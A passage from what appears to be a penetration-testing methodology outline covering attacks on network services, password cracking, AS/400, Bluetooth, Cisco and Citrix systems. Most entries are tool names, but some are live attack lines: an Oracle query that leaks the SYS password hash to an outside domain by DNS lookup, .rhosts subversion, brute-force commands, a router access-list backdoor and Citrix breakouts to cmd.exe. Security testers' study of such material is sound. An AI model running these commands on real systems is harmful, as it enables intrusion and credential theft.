15.14.3.3.1. msadClassesAttrs.ldif
15.14.3.4. Netscape Directory Server 4
15.14.3.4.1. nsslapd.sas_at.conf
15.14.3.4.2. nsslapd.sas_oc.conf
15.14.3.5. OpenLDAP directory server
15.14.3.5.1. slapd.sas_at.conf
15.14.3.5.2. slapd.sas_oc.conf
15.14.3.6. Sun ONE Directory Server 5.1
15.14.3.6.1. 75sas.ldif
15.15. PPTP/L2TP/VPN port 500/1723 open
15.15.1. Enumeration
15.15.1.1. ike-scan
15.15.1.2. ike-probe
15.15.2. Brute-Force
15.15.2.1. ike-crack
15.15.3. Reference Material
15.15.3.1. PSK cracking paper
15.15.3.2. SecurityFocus Infocus
15.15.3.3. Scanning a VPN Implementation
15.16. Modbus port 502 open
15.16.1. modscan
15.17. rlogin port 513 open
15.17.1. Rlogin Enumeration
15.17.1.1. Find the files
15.17.1.1.1. find / -name .rhosts
15.17.1.1.2. locate .rhosts
15.17.1.2. Examine Files
15.17.1.2.1. cat .rhosts
15.17.1.3. Manual Login
15.17.1.3.1. rlogin hostname -l username
15.17.1.3.2. rlogin <IP>
15.17.1.4. Subvert the files
15.17.1.4.1. echo ++ > .rhosts
15.17.2. Rlogin Brute force
15.17.2.1. Hydra
15.18. rsh port 514 open
15.18.1. Rsh Enumeration
15.18.1.1. rsh host [-l username] [-n] [-d] [-k realm] [-f | -F] [-x] [-PN | -PO] command
15.18.2. Rsh Brute Force
15.18.2.1. rsh-grind
15.18.2.2. Hydra
15.18.2.3. medusa
15.19. SQL Server Port 1433 1434 open
15.19.1. SQL Enumeration
15.19.1.1. piggy
15.19.1.2. SQLPing
15.19.1.2.1. sqlping ip_address/hostname
15.19.1.3. SQLPing2
15.19.1.4. SQLPing3
15.19.1.5. SQLpoke
15.19.1.6. SQL Recon
15.19.1.7. SQLver
15.19.2. SQL Brute Force
15.19.2.1. SQLPAT
15.19.2.1.1. sqlbf -u hashes.txt -d dictionary.dic -r out.rep - Dictionary Attack
15.19.2.1.2. sqlbf -u hashes.txt -c default.cm -r out.rep - Brute-Force Attack
15.19.2.2. SQL Dict
15.19.2.3. SQLAT
15.19.2.4. Hydra
15.19.2.5. SQLlhf
15.19.2.6. ForceSQL
15.20. Citrix port 1494 open
15.20.1. Citrix Enumeration
15.20.1.1. Default Domain
15.20.1.2. Published Applications
15.20.1.2.1. ./citrix-pa-scan {IP_address/file | - | random} [timeout]
15.20.1.2.2. citrix-pa-proxy.pl IP_to_proxy_to [Local_IP]
15.20.2. Citrix Brute Force
15.20.2.1. bforce.js
15.20.2.2. connect.js
15.20.2.3. Citrix Brute-forcer
15.20.2.4. Reference Material
15.20.2.4.1. Hacking Citrix - the legitimate backdoor
15.20.2.4.2. Hacking Citrix - the forceful way
15.21. Oracle Port 1521 Open
15.21.1. Oracle Enumeration
15.21.1.1. oracsec
15.21.1.2. Repscan
15.21.1.3. Sidguess
15.21.1.4. Scuba
15.21.1.5. DNS/HTTP Enumeration
15.21.1.5.1. SQL> SELECT UTL_INADDR.GET_HOST_ADDRESS((SELECT PASSWORD FROM DBA_USERS WHERE US ERNAME='SYS')||'.vulnerabilityassessment.co.uk') FROM DUAL; SELECT UTL_INADDR.GET_HOST_ADDRESS((SELECT PASSWORD FROM DBA_USERS WHERE USERNAM E='SYS')||'.vulnerabilityassessment.co.uk') FROM DUAL
15.21.1.5.2. Untitled
15.21.1.6. WinSID
15.21.1.7. Oracle default password list
15.21.1.8. TNSVer
15.21.1.8.1. tnsver host [port]
15.21.1.9. TCP Scan
15.21.1.10. Oracle TNSLSNR
15.21.1.10.1. Will respond to: [ping] [version] [status] [service] [change_password] [help] [reload] [save_config] [set log_directory] [set display_mode] [set log_file] [show] [spawn] [stop]
15.21.1.11. TNSCmd
15.21.1.11.1. perl tnscmd.pl -h ip_address
15.21.1.11.2. perl tnscmd.pl version -h ip_address
15.21.1.11.3. perl tnscmd.pl status -h ip_address
15.21.1.11.4. perl tnscmd.pl -h ip_address --cmdsize (40 - 200)
15.21.1.12. LSNrCheck
15.21.1.13. Oracle Security Check (needs credentials)
15.21.1.14. OAT
15.21.1.14.1. sh opwg.sh -s ip_address
15.21.1.14.2. opwg.bat -s ip_address
15.21.1.14.3. sh oquery.sh -s ip_address -u username -p password -d SID OR c:\oquery -s ip_address -u username -p password -d SID
15.21.1.15. OScanner
15.21.1.15.1. sh oscanner.sh -s ip_address
15.21.1.15.2. oscanner.exe -s ip_address
15.21.1.15.3. sh reportviewer.sh oscanner_saved_file.xml
15.21.1.15.4. reportviewer.exe oscanner_saved_file.xml
15.21.1.16. NGS Squirrel for Oracle
15.21.1.17. Service Register
15.21.1.17.1. Service-register.exe ip_address
15.21.1.18. PLSQL Scanner 2008
15.21.2. Oracle Brute Force
15.21.2.1. OAK
15.21.2.1.1. ora-getsid hostname port sid_dictionary_list
15.21.2.1.2. ora-auth-alter-session host port sid username password sql
15.21.2.1.3. ora-brutesid host port start
15.21.2.1.4. ora-pwdbrute host port sid username password-file
15.21.2.1.5. ora-userenum host port sid userlistfile
15.21.2.1.6. ora-ver -e (-f -l -a) host port
15.21.2.2. breakable (Targets Application Server Port)
15.21.2.2.1. breakable.exe host url [port] [v]host ip_address of the Oracle Portal Serverurl PATH_INFO i.e. /pls/orassoport TCP port Oracle Portal Server is serving pages fromv verbose
15.21.2.3. SQLInjector (Targets Application Server Port)
15.21.2.3.1. sqlinjector -t ip_address -a database -f query.txt -p 80 -gc 200 -ec 500 -k NGS SOFTWARE -gt SQUIRREL
15.21.2.3.2. sqlinjector.exe -t ip_address -p 7777 -a where -gc 200 -ec 404 -qf q.txt -f plsql.txt -s oracle
15.21.2.4. Check Password
15.21.2.5. orabf
15.21.2.5.1. orabf [hash]:[username] [options]
15.21.2.6. thc-orakel
15.21.2.6.1. Cracker
15.21.2.6.2. Client
15.21.2.6.3. Crypto
15.21.2.7. DBVisualisor
15.21.2.7.1. Sql scripts from pentest.co.uk
15.21.2.7.2. Manual sql input of previously reported vulnerabilties
15.21.3. Oracle Reference Material
15.21.3.1. Understanding SQL Injection
15.21.3.2. SQL Injection walkthrough
15.21.3.3. SQL Injection by example
15.21.3.4. Advanced SQL Injection in Oracle databases
15.21.3.5. Blind SQL Injection
15.21.3.6. SQL Cheatsheets
15.21.3.6.1. Untitled
15.22. NFS Port 2049 open
15.22.1. NFS Enumeration
15.22.1.1. showmount -e hostname/ip_address
15.22.1.2. mount -t nfs ip_address:/directory_found_exported /local_mount_point
15.22.2. NFS Brute Force
15.22.2.1. Interact with NFS share and try to add/delete
15.22.2.2. Exploit and Confuse Unix
15.22.3. Examine Configuration Files
15.22.3.1. /etc/exports
15.22.3.2. /etc/lib/nfs/xtab
15.22.4. nmap nse script
15.22.4.1. nfs-showmount
15.23. Compaq/HP Insight Manager Port 2301,2381open
15.23.1. HP Enumeration
15.23.1.1. Authentication Method
15.23.1.1.1. Host OS Authentication
15.23.1.1.2. Default Authentication
15.23.1.2. Wikto
15.23.1.3. Nstealth
15.23.2. HP Bruteforce
15.23.2.1. Hydra
15.23.2.2. Acunetix
15.23.3. Examine Configuration Files
15.23.3.1. path.properties
15.23.3.2. mx.log
15.23.3.3. CLIClientConfig.cfg
15.23.3.4. database.props
15.23.3.5. pg_hba.conf
15.23.3.6. jboss-service.xml
15.23.3.7. .namazurc
15.24. MySQL port 3306 open
15.24.1. Enumeration
15.24.1.1. nmap -A -n -p3306 <IP Address>
15.24.1.2. nmap -A -n -PN --script:ALL -p3306 <IP Address>
15.24.1.3. telnet IP_Address 3306
15.24.1.4. use test; select * from test;
15.24.1.5. To check for other DB's -- show databases
15.24.2. Administration
15.24.2.1. MySQL Network Scanner
15.24.2.2. MySQL GUI Tools
15.24.2.3. mysqlshow
15.24.2.4. mysqlbinlog
15.24.3. Manual Checks
15.24.3.1. Default usernames and passwords
15.24.3.1.1. username: root password:
15.24.3.1.2. testing
15.24.3.2. Configuration Files
15.24.3.2.1. Operating System
15.24.3.2.2. Command History
15.24.3.2.3. Log Files
15.24.3.2.4. To run many sql commands at once -- mysql -u username -p < manycommands.sql
15.24.3.2.5. MySQL data directory (Location specified in my.cnf)
15.24.3.2.6. SSL Check
15.24.3.3. Privilege Escalation
15.24.3.3.1. Current Level of access
15.24.3.3.2. Access passwords
15.24.3.3.3. Create a new user and grant him privileges
15.24.3.3.4. Break into a shell
15.24.4. SQL injection
15.24.4.1. mysql-miner.pl
15.24.4.1.1. mysql-miner.pl http://target/ expected_string database
15.24.4.2. http://www.imperva.com/resources/adc/sql_injection_signatures_evasion.html
15.24.4.3. http://www.justinshattuck.com/2007/01/18/mysql-injection-cheat-sheet/
15.24.5. References.
15.24.5.1. Design Weaknesses
15.24.5.1.1. MySQL running as root
15.24.5.1.2. Exposed publicly on Internet
15.24.5.2. http://cve.mitre.org/cgi-bin/cvekey.cgi?keyword=mysql
15.24.5.3. http://search.securityfocus.com/swsearch?sbm=%2F&metaname=alldoc&query=mysql&x=0&y=0
15.25. RDesktop port 3389 open
15.25.1. Rdesktop Enumeration
15.25.1.1. Remote Desktop Connection
15.25.2. Rdestop Bruteforce
15.25.2.1. TSGrinder
15.25.2.1.1. tsgrinder.exe -w dictionary_file -l leet -d workgroup -u administrator -b -n 2 IP_Address
15.25.2.2. Tscrack
15.26. Sybase Port 5000+ open
15.26.1. Sybase Enumeration
15.26.1.1. sybase-version ip_address from NGS
15.26.2. Sybase Vulnerability Assessment
15.26.2.1. Use DBVisualiser
15.26.2.1.1. Sybase Security checksheet
15.26.2.1.2. Manual sql input of previously reported vulnerabilties
15.26.2.2. NGS Squirrel for Sybase
15.27. SIP Port 5060 open
15.27.1. SIP Enumeration
15.27.1.1. netcat
15.27.1.1.1. nc IP_Address Port
15.27.1.2. sipflanker
15.27.1.2.1. python sipflanker.py 192.168.1-254
15.27.1.3. Sipscan
15.27.1.4. smap
15.27.1.4.1. smap IP_Address/Subnet_Mask
15.27.1.4.2. smap -o IP_Address/Subnet_Mask
15.27.1.4.3. smap -l IP_Address
15.27.2. SIP Packet Crafting etc.
15.27.2.1. sipsak
15.27.2.1.1. Tracing paths: - sipsak -T -s sip:usernaem@domain
15.27.2.1.2. Options request:- sipsak -vv -s sip:username@domain
15.27.2.1.3. Query registered bindings:- sipsak -I -C empty -a password -s sip:username@domain
15.27.2.2. siprogue
15.27.3. SIP Vulnerability Scanning/ Brute Force
15.27.3.1. tftp bruteforcer
15.27.3.1.1. Default dictionary file
15.27.3.1.2. ./tftpbrute.pl IP_Address Dictionary_file Maximum_Processes
15.27.3.2. VoIPaudit
15.27.3.3. SiVuS
15.27.4. Examine Configuration Files
15.27.4.1. SIPDefault.cnf
15.27.4.2. asterisk.conf
15.27.4.3. sip.conf
15.27.4.4. phone.conf
15.27.4.5. sip_notify.conf
15.27.4.6. <Ethernet address>.cfg
15.27.4.7. 000000000000.cfg
15.27.4.8. phone1.cfg
15.27.4.9. sip.cfg etc. etc.
15.28. VNC port 5900^ open
15.28.1. VNC Enumeration
15.28.1.1. Scans
15.28.1.1.1. 5900^ for direct access.5800 for HTTP access.
15.28.2. VNC Brute Force
15.28.2.1. Password Attacks
15.28.2.1.1. Remote
15.28.2.1.2. Local
15.28.3. Exmine Configuration Files
15.28.3.1. .vnc
15.28.3.2. /etc/vnc/config
15.28.3.3. $HOME/.vnc/config
15.28.3.4. /etc/sysconfig/vncservers
15.28.3.5. /etc/vnc.conf
15.29. Tor Port 9001, 9030 open
15.29.1. Tor Node Checker
15.29.1.1. Ip Pages
15.29.1.2. Kewlio.net
15.29.2. nmap NSE script
15.30. Jet Direct 9100 open
15.30.1. hijetta
16. Password cracking
16.1. Rainbow crack
16.1.1. ophcrack
16.1.2. rainbow tables
16.1.2.1. rcrack c:\rainbowcrack\*.rt -f pwfile.txt
16.2. Ophcrack
16.3. Cain & Abel
16.4. John the Ripper
16.4.1. ./unshadow passwd shadow > file_to_crack
16.4.2. ./john -single file_to_crack
16.4.3. ./john -w=location_of_dictionary_file -rules file_to_crack
16.4.4. ./john -show file_to_crack
16.4.5. ./john --incremental:All file_to_crack
16.5. fgdump
16.5.1. fgdump [-t][-c][-w][-s][-r][-v][-k][-l logfile][-T threads] {{-h Host | -f filename} -u Username -p Password | -H filename} i.e. fgdump.exe -u hacker -p hard_password -c -f target.txt
16.6. pwdump6
16.7. medusa
16.8. LCP
16.9. L0phtcrack (Note: - This tool was aquired by Symantec from @Stake and it is there policy not to ship outside the USA and Canada
16.9.1. Domain credentials
16.9.2. Sniffing
16.9.3. pwdump import
16.9.4. sam import
16.10. aiocracker
16.10.1. aiocracker.py [md5, sha1, sha256, sha384, sha512] hash dictionary_list
17. Vulnerability Assessment - Utilising vulnerability scanners all discovered hosts can then be tested for vulnerabilities. The result would then be analysed to determine if there any vulnerabilities that could be exploited to gain access to a target host on a network. A number of tests carried out by these scanners are just banner grabbing/ obtaining version information, once these details are known, the version is compared with any common vulnerabilities and exploits (CVE) that have been released and reported to the user. Other tools actually use manual pen testing methods and display the output received i.e. showmount -e ip_address would display the NFS shares available to the scanner whcih would then need to be verified by the tester.
17.1. Manual
17.1.1. Patch Levels
17.1.2. Confirmed Vulnerabilities
17.1.2.1. Severe
17.1.2.2. High
17.1.2.3. Medium
17.1.2.4. Low
17.2. Automated
17.2.1. Reports
17.2.2. Vulnerabilities
17.2.2.1. Severe
17.2.2.2. High
17.2.2.3. Medium
17.2.2.4. Low
17.3. Tools
17.3.1. GFI
17.3.2. Nessus (Linux)
17.3.2.1. Nessus (Windows)
17.3.3. NGS Typhon
17.3.4. NGS Squirrel for Oracle
17.3.5. NGS Squirrel for SQL
17.3.6. SARA
17.3.7. MatriXay
17.3.8. BiDiBlah
17.3.9. SSA
17.3.10. Oval Interpreter
17.3.11. Xscan
17.3.12. Security Manager +
17.3.13. Inguma
17.4. Resources
17.4.1. Security Focus
17.4.2. Microsoft Security Bulletin
17.4.3. Common Vulnerabilities and Exploits (CVE)
17.4.4. National Vulnerability Database (NVD)
17.4.5. The Open Source Vulnerability Database (OSVDB)
17.4.5.1. Standalone Database
17.4.5.1.1. Update URL
17.4.6. United States Computer Emergency Response Team (US-CERT)
17.4.7. Computer Emergency Response Team
17.4.8. Mozilla Security Information
17.4.9. SANS
17.4.10. Securiteam
17.4.11. PacketStorm Security
17.4.12. Security Tracker
17.4.13. Secunia
17.4.14. Vulnerabilities.org
17.4.15. ntbugtraq
17.4.16. Wireless Vulnerabilities and Exploits (WVE)
17.5. Blogs
17.5.1. Carnal0wnage
17.5.2. Fsecure Blog
17.5.3. g0ne blog
17.5.4. GNUCitizen
17.5.5. ha.ckers Blog
17.5.6. Jeremiah Grossman Blog
17.5.7. Metasploit
17.5.8. nCircle Blogs
17.5.9. pentest mokney.net
17.5.10. Rational Security
17.5.11. Rational Security
17.5.12. Rise Security
17.5.13. Security Fix Blog
17.5.14. Software Vulnerability Exploitation Blog
17.5.15. Software Vulnerability Exploitation Blog
17.5.16. Taosecurity Blog
18. AS/400 Auditing
18.1. Remote
18.1.1. Information Gathering
18.1.1.1. Nmap using common iSeries (AS/400) services.
18.1.1.1.1. Unsecured services (Port;name;description)
18.1.1.1.2. Secured services (Port;name;description)
18.1.1.2. NetCat (old school technique)
18.1.1.2.1. nc -v -z -w target ListOfServices.txt | grep "open"
18.1.1.3. Banners Grabbing
18.1.1.3.1. Telnet
18.1.1.3.2. FTP
18.1.1.3.3. HTTP Banner
18.1.1.3.4. POP3
18.1.1.3.5. SNMP
18.1.1.3.6. SMTP
18.1.2. Users Enumeration
18.1.2.1. Default AS/400 users accounts
18.1.2.2. Error messages
18.1.2.2.1. Telnet Login errors
18.1.2.2.2. POP3 authentication Errors
18.1.2.3. Qsys symbolic link (if ftp is enabled)
18.1.2.3.1. ftp target | quote stat | quote site namefmt 1
18.1.2.3.2. cd /
18.1.2.3.3. quote site listfmt 1
18.1.2.3.4. mkdir temp
18.1.2.3.5. quote rcmd ADDLNK OBJ('/qsys.lib') NEWLNK('/temp/qsys')
18.1.2.3.6. quote rcmd QSH CMD('ln -fs /qsys.lib /temp/qsys')
18.1.2.3.7. dir /temp/qsys/*.usrprf
18.1.2.4. LDAP
18.1.2.4.1. Need os400-sys value from ibm-slapdSuffix
18.1.2.4.2. Tool to browse LDAP
18.1.3. Exploitation
18.1.3.1. CVE References
18.1.3.1.1. http://cve.mitre.org/cgi-bin/cvekey.cgi?keyword=AS400
18.1.3.1.2. CVE-2005-1244 - Severity : High - CVSS : 7.0
18.1.3.1.3. CVE-2005-1243 - Severity : Low - CVSS : 3.3
18.1.3.1.4. CVE-2005-1242 - Severity : Low - CVSS : 3.3
18.1.3.1.5. CVE-2005-1241 - Severity : High - CVSS : 7.0
18.1.3.1.6. CVE-2005-1240 - Severity : High - CVSS : 7.0
18.1.3.1.7. CVE-2005-1239 - Severity : Low - CVSS : 3.3
18.1.3.1.8. CVE-2005-1238 - Severity : High - CVSS : 9.0
18.1.3.1.9. CVE-2005-1182 - Severity : Low - CVSS : 3.3
18.1.3.1.10. CVE-2005-1133 - Severity : Low - CVSS : 3.3
18.1.3.1.11. CVE-2005-1025 - Severity : Low - CVSS : 3.3
18.1.3.1.12. CVE-2005-0868 - Severity : High - CVSS : 7.0
18.1.3.1.13. CVE-2005-0899 - Severity : Low - CVSS : 2.3
18.1.3.1.14. CVE-2002-1822 - Severity : Low - CVSS : 3.3
18.1.3.1.15. CVE-2002-1731 - Severity : Low - CVSS : 2.3
18.1.3.1.16. CVE-2000-1038 - Severity : Low - CVSS : 3.3
18.1.3.1.17. CVE-1999-1279 - Severity : Low - CVSS : 3.3
18.1.3.1.18. CVE-1999-1012 - Severity : Low - CVSS : 3.3
18.1.3.2. Access with Work Station Gateway
18.1.3.2.1. http://target:5061/WSG
18.1.3.2.2. Default AS/400 accounts.
18.1.3.3. Network attacks (next release)
18.1.3.3.1. DB2
18.1.3.3.2. QSHELL
18.1.3.3.3. Hijacking Terminals
18.1.3.3.4. Trojan attacks
18.1.3.3.5. Hacking from AS/400
18.2. Local
18.2.1. System Value Security
18.2.1.1. Untitled
18.2.1.1.1. Untitled
18.2.1.2. Untitled
18.2.1.2.1. Untitled
18.2.1.3. Untitled
18.2.1.3.1. Untitled
18.2.1.4. Untitled
18.2.1.4.1. Recommended value is 30
18.2.2. Password Policy
18.2.2.1. Untitled
18.2.2.1.1. Untitled
18.2.2.1.2. Untitled
18.2.2.2. Untitled
18.2.2.2.1. Untitled
18.2.2.3. Untitled
18.2.2.3.1. Untitled
18.2.2.4. Untitled
18.2.2.4.1. Untitled
18.2.2.5. Untitled
18.2.3. Audit level
18.2.3.1. Untitled
18.2.3.1.1. Recommended value is *SECURITY
18.2.4. Documentation
18.2.4.1. Users class
18.2.4.1.1. Untitled
18.2.4.2. System Audit Settings
18.2.4.2.1. Untitled
18.2.4.3. Special Authorities Definitions
18.2.4.3.1. Untitled
19. Bluetooth Specific Testing
19.1. Bluescanner
19.2. Bluesweep
19.3. btscanner
19.4. Redfang
19.5. Blueprint
19.6. Bluesnarfer
19.7. Bluebugger
19.7.1. bluebugger [OPTIONS] -a <addr> [MODE]
19.8. Blueserial
19.9. Bloover
19.10. Bluesniff
19.11. Exploit Frameworks
19.11.1. BlueMaho
19.11.1.1. Untitled
19.12. Resources
19.12.1. URL's
19.12.1.1. BlueStumbler.org
19.12.1.2. Bluejackq.com
19.12.1.3. Bluejacking.com
19.12.1.4. Bluejackers
19.12.1.5. bluetooth-pentest
19.12.1.6. ibluejackedyou.com
19.12.1.7. Trifinite
19.12.2. Vulnerability Information
19.12.2.1. Common Vulnerabilities and Exploits (CVE)
19.12.2.1.1. Vulnerabilties and exploit information relating to these products can be found here: http://cve.mitre.org/cgi-bin/cvekey.cgi?keyword=bluetooth
19.12.3. White Papers
19.12.3.1. Bluesnarfing
20. Cisco Specific Testing
20.1. Methodology
20.1.1. Scan & Fingerprint.
20.1.1.1. Untitled
20.1.1.2. Untitled
20.1.1.3. If SNMP is active, then community string guessing should be performed.
20.1.2. Credentials Guessing.
20.1.2.1. Untitled
20.1.2.2. Attempt to guess Telnet, HTTP and SSH account credentials. Once you have non-privileged access, attempt to discover the 'enable' password. Also attempt to guess Simple Network Management Protocol (SNMP) community strings as they can lead to the config files of the router and therefore the 'enable' password!
20.1.3. Connect
20.1.3.1. Untitled
20.1.3.2. If you have determined the 'enable' password, then full access has been achieved and you can alter the configuration files of the router.
20.1.4. Check for bugs
20.1.4.1. Untitled
20.1.4.1.1. The most widely knwon/ used are: Nessus, Retina, GFI LanGuard and Core Impact.
20.1.4.1.2. There are also tools that check for specific flaws, such as the HTTP Arbitrary Access Bug: ios-w3-vuln
20.1.5. Further your attack
20.1.5.1. Untitled
20.1.5.1.1. running-config is the currently running configuration settings. This gets loaded from the startup-config on boot. This configuration file is editable and the changes are immediate. Any changes will be lost once the router is rebooted. It is this file that requires altering to maintain a non-permenant connection through to the internal network.
20.1.5.1.2. startup-config is the boot up configuration file. It is this file that needs altering to maintain a permenant connection through to the internal network.
20.1.5.2. Untitled
20.1.5.2.1. #> access-list 100 permit ip <IP> any
20.2. Scan & Fingerprint.
20.2.1. Port Scanning
20.2.1.1. nmap
20.2.1.1.1. Untitled
20.2.1.2. Other tools
20.2.1.2.1. Untitled
20.2.1.2.2. mass-scanner is a simple scanner for discovering Cisco devices within a given network range.
20.2.2. Fingerprinting
20.2.2.1. Untitled
20.2.2.1.1. BT cisco-torch-0.4b # cisco-torch.pl -A 10.1.1.175
20.2.2.2. Untitled
20.2.2.2.1. TCP Port scan - nmap -sV -O -v -p 23,80 <IP> -oN TCP.version.txt
20.2.2.2.2. Untitled
20.3. Password Guessing.
20.3.1. Untitled
20.3.1.1. ./CAT -h <IP> -a password.wordlist
20.3.1.2. Untitled
20.3.2. Untitled
20.3.2.1. ./enabler <IP> [-u username] -p password /password.wordlist [port]
20.3.2.2. Untitled
20.3.3. Untitled
20.3.3.1. BT tmp # hydra -l "" -P password.wordlist -t 4 <IP> cisco
20.3.3.2. Untitled
20.4. SNMP Attacks.
20.4.1. Untitled
20.4.1.1. ./CAT -h <IP> -w SNMP.wordlist
20.4.1.2. Untitled
20.4.2. Untitled
20.4.2.1. onesixytone -c SNMP.wordlist <IP>
20.4.2.2. BT onesixtyone-0.3.2 # onesixtyone -c dict.txt 10.1.1.175 Scanning 1 hosts, 64 communities 10.1.1.175 [enable] Cisco Internetwork Operating System Software IOS (tm) C2600 Software (C2600-IK9O3S3-M), Version 12.2(15)T17, RELEASE SOFTWARE (fc1) Technical Support: http://www.cisco.com/techsupport Copyright (c) 1986-2005 by cisco Systems, Inc. Compiled Fri 12-Aug 10.1.1.175 [Cisco] Cisco Internetwork Operating System Software IOS (tm) C2600 Software (C2600-IK9O3S3-M), Version 12.2(15)T17, RELEASE SOFTWARE (fc1) Technical Support: http://www.cisco.com/techsupport Copyright (c) 1986-2005 by cisco Systems, Inc. Compiled Fri 12-Aug
20.4.3. Untitled
20.4.3.1. snmapwalk -v <Version> -c <Community string> <IP>
20.4.3.2. Untitled
20.5. Connecting.
20.5.1. Telnet
20.5.1.1. Untitled
20.5.1.1.1. telnet <IP>
20.5.1.1.2. Sample Banners
20.5.2. SSH
20.5.3. Web Browser
20.5.3.1. Untitled
20.5.3.1.1. This uses a combination of username and password to authenticate. After browsing to the target device, an "Authentication Required" box will pop up with text similar to the following:
20.5.3.1.2. Authentication Required Enter username and password for "level_15_access" at http://10.1.1.1 User Name: Password:
20.5.3.1.3. Once logged in, you have non-privileged mode access and can even configure the router through a command interpreter.
20.5.4. TFTP
20.5.4.1. Untitled
20.5.4.1.1. Untitled
20.5.4.1.2. ios-w3-vuln exploits the HTTP Access Bug to 'fetch' the running-config to your local TFTP server. Both of these tools require the config files to be saved with default names.
20.5.4.2. Untitled
20.5.4.2.1. ./cisco-torch.pl <options> <IP,hostname,network>
20.5.4.2.2. ./cisco-torch.pl <options> -F <hostlist>
20.5.4.2.3. Creating backdoors in Cisco IOS using TCL
20.6. Known Bugs.
20.6.1. Attack Tools
20.6.1.1. Untitled
20.6.1.1.1. Untitled
20.6.1.2. Untitled
20.6.1.2.1. Web browse to the Cisco device: http://<IP>
20.6.1.2.2. Untitled
20.6.1.2.3. Untitled
20.6.1.2.4. Untitled
20.6.1.3. Untitled
20.6.1.3.1. ./ios-w3-vul 192.168.1.1 fetch > /tmp/router.txt
20.6.2. Common Vulnerabilities and Exploits (CVE) Information
20.6.2.1. Vulnerabilties and exploit information relating to these products can be found here:http://cve.mitre.org/cgi-bin/cvekey.cgi?keyword=cisco+IOS
20.7. Configuration Files.
20.7.1. Untitled
20.7.1.1. Configuration files explained
20.7.1.1.1. The line that reads "enable password router", where "router" is the password, is the TTY console password which is superceeded by the enable secret password for remote access.
20.7.1.1.2. Untitled
20.7.1.1.3. Untitled
20.7.1.1.4. Password Encryption Utilised
20.7.1.1.5. Untitled
20.7.1.2. Configuration Testing Tools
20.7.1.2.1. Nipper
20.7.1.2.2. fwauto (Beta)
20.8. References.
20.8.1. Cisco IOS Exploitation Techniques
21. Citrix Specific Testing
21.1. Citrix provides remote access services to multiple users across a wide range of platforms. The following information I have put together which will hopefully help you conduct a vulnerability assessment/ penetration test against Citrix
21.2. Enumeration
21.2.1. web search
21.2.1.1. Google (GHDB)
21.2.1.1.1. ext:ica
21.2.1.1.2. inurl:citrix/metaframexp/default/login.asp
21.2.1.1.3. [WFClient] Password= filetype:ica
21.2.1.1.4. inurl:citrix/metaframexp/default/login.asp? ClientDetection=On
21.2.1.1.5. inurl:metaframexp/default/login.asp | intitle:"Metaframe XP Login"
21.2.1.1.6. inurl:/Citrix/Nfuse17/
21.2.1.1.7. inurl:Citrix/MetaFrame/default/default.aspx
21.2.1.2. Google Hacks (Author Discovered)
21.2.1.2.1. filetype:ica Username=
21.2.1.2.2. inurl:/Citrix/AccessPlatform/
21.2.1.2.3. inurl:LogonAgent/Login.asp
21.2.1.2.4. inurl:/CITRIX/NFUSE/default/login.asp
21.2.1.2.5. inurl:/Citrix/NFuse161/login.asp
21.2.1.2.6. inurl:/Citrix/NFuse16
21.2.1.2.7. inurl:/Citrix/NFuse151/
21.2.1.2.8. allintitle:MetaFrame XP Login
21.2.1.2.9. allintitle:MetaFrame Presentation Server Login
21.2.1.2.10. inurl:Citrix/~bespoke_company_name~/default/login.aspx?ClientDetection=On
21.2.1.2.11. allintitle:Citrix(R) NFuse(TM) Classic Login
21.2.1.3. Yahoo
21.2.1.3.1. originurlextension:ica
21.2.2. site search
21.2.2.1. Manual
21.2.2.1.1. review web page for useful information
21.2.2.1.2. review source for web page
21.2.3. generic
21.2.3.1. nmap -A -PN -p 80,443,1494 ip_address
21.2.3.2. amap -bqv ip_address port_no.
21.2.4. citrix specific
21.2.4.1. enum.pl
21.2.4.1.1. perl enum.pl ip_address
21.2.4.2. enum.js
21.2.4.2.1. enum.js apps TCPBrowserAdress=ip_address
21.2.4.3. connect.js
21.2.4.3.1. connect.js TCPBrowserAdress=ip_address Application=advertised-application
21.2.4.4. Citrix-pa-scan
21.2.4.4.1. perl pa-scan.pl ip_address [timeout] > pas.wri
21.2.4.5. pabrute.c
21.2.4.5.1. ./pabrute pubapp list app_list ip_address
21.2.5. Default Ports
21.2.5.1. TCP
21.2.5.1.1. Citrix XML Service
21.2.5.1.2. Advanced Management Console
21.2.5.1.3. Citrix SSL Relay
21.2.5.1.4. ICA sessions
21.2.5.1.5. Server to server
21.2.5.1.6. Management Console to server
21.2.5.1.7. Session Reliability (Auto-reconnect)
21.2.5.1.8. License Management Console
21.2.5.1.9. License server
21.2.5.2. UDP
21.2.5.2.1. Clients to ICA browser service
21.2.5.2.2. Server-to-server
21.2.6. nmap nse scripts
21.2.6.1. citrix-enum-apps
21.2.6.1.1. nmap -sU --script=citrix-enum-apps -p 1604 <host>
21.2.6.2. citrix-enum-apps-xml
21.2.6.2.1. nmap --script=citrix-enum-apps-xml -p 80,443 <host>
21.2.6.3. citrix-enum-servers
21.2.6.3.1. nmap -sU --script=citrix-enum-servers -p 1604
21.2.6.4. citrix-enum-servers-xml
21.2.6.4.1. nmap --script=citrix-enum-servers-xml -p 80,443 <host>
21.2.6.5. citrix-brute-xml
21.2.6.5.1. nmap --script=citrix-brute-xml --script-args=userdb=<userdb>,passdb=<passdb>,ntdomain=<domain> -p 80,443 <host>
21.3. Scanning
21.3.1. Nessus
21.3.1.1. Plugins
21.3.1.1.1. CGI abuses
21.3.1.1.2. CGI abuses : Cross Site Scripting (XSS)
21.3.1.1.3. Misc.
21.3.1.1.4. Service Detection
21.3.1.1.5. Web Servers
21.3.1.1.6. Windows
21.3.2. Nikto
21.3.2.1. perl nikto.pl -host ip_address -port port_no.
21.3.2.1.1. Untitled
21.4. Exploitation
21.4.1. Alter default .ica files
21.4.1.1. InitialProgram=cmd.exe
21.4.1.2. InitialProgram=explorer.exe
21.4.2. Enumerate and Connect
21.4.2.1. For applications identified by Citrix-pa-scan
21.4.2.1.1. Pas
21.4.2.2. For published applications with a Citrix client when the master browser is non-public.
21.4.2.2.1. Citrix-pa-proxy
21.4.3. Manual Testing
21.4.3.1. Create Batch File (cmd.bat)
21.4.3.1.1. 1
21.4.3.1.2. 2
21.4.3.2. Host Scripting File (cmd.vbs)
21.4.3.2.1. Option Explicit
21.4.3.2.2. Dim objShell
21.4.3.2.3. objShell.Run "%comspec% /k"
21.4.3.2.4. WScript.Quit
21.4.3.2.5. alternative functionality
21.4.3.3. iKat
21.4.3.3.1. Integrated Kiosk Attack Tool
21.4.3.4. AT Command - priviledge escalation
21.4.3.4.1. AT HH:MM /interactive "cmd.exe"
21.4.3.4.2. AT HH:MM /interactive %comspec% /k
21.4.3.4.3. Untitled
21.4.3.5. Keyboard Shortcuts/ Hotkeys
